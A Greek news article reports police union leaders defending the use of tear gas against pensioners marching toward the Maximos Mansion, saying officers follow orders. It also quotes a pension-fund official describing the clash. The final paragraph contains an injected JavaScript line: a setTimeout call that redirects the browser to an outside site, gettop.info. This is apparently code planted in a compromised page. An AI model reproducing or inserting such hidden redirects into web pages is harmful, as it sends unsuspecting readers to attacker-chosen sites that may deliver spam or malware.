Πρόεδρος αστυνομικών για τα χημικά: Η Αστυνομία εκτελεί εντολές

0
4

 

«Η Αστυνομία με όλες τις κυβερνήσεις εκτελεί εντολές», ξεκαθάρισε ο πρόεδρος της Πανελλήνιας Ομοσπονδίας Αστυνομικών Υπαλλήλων, Γ.Γερακαράκος, μιλώντας στον ANT1 για τα όσα εκτυλίχθηκαν χθες μεταξύ συνταξιούχων και αστυνομικών.

Όπως εξήγησε ο ίδιος, «χρήση χημικών μπορεί να γίνει, όταν ο επικεφαλής της διμοιρίας δει ότι υπάρχει άμεση ανάγκη να γίνει η χρήση, γιατί υπάρχει κίνδυνος για τους διαδηλωτές ή τους αστυνομικούς» και διευκρίνισε ότι, «ο θάλαμος επιχειρήσεων έχει εικόνα, βλέπει τι γίνεται».

Ωστόσο, «πολλές φορές πρέπει να πάρεις αποφάσεις εκείνη τη στιγμή».

Ο Γ.Γερακαράκος δήλωσε, σύμφωνα με το antenna.gr, ότι, «όλες οι εντολές μαγνητοφωνούνται, εκτός αυτών που δίνονται μέσω ασυρμάτου».

Τέλος, έθεσε το ερώτημα «πώς αλλιώς θα μπορούσε να εμποδιστεί μία πορεία που κατευθύνεται προς το Μαξίμου, με κλομπ;».

«Είμαστε έτοιμοι να δούμε ανοιγμένα κεφάλια;»
, είπε χαρακτηριστικά.

Ο Γενικός Γραμματέας του ΕΤΕΑ, Α.Κάντας, μιλώντας επίσης στην πρωινή εκπομπή του ΑΝΤ1, περιέγραψε πως αντιπροσωπεία συνταξιούχων που βρίσκονταν στην κεφαλή της πορείας ζήτησε από τον αστυνομικό διευθυντή να μεταβεί στο Μαξίμου και όταν εκείνος δεν τους επέτρεψε είχε ήδη φτάσει στο σημείο όλη η πορεία και δημιουργήθηκε πανδαιμόνιο.

«Με αυτούς τους ανθρώπους ήμασταν μαζί και δίναμε κοινωνικούς αγώνες
», είπε τέλος ο Α.Κάντας.

Στη συνέχεια ο αντιπρόεδρος της Ομοπονδίας Αστυνομικών Υπαλλήλων Σταύρος Μπαλάσκας, μιλώντας κι αυτός στον ΑΝΤ1, τόνισε ότι οι άνδρες των ΜΑΤ δεν είχαν εντολές να επιτρέψουν στους συνταξιούχους να περάσουν στο Μαξίμου για συνάντηση με τον πρωθυπουργό. Επίσης, σημείωσε ότι οι αστυνομικοί έχουν στάδια αντίδρασης σε μάζες δαδηλωτών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here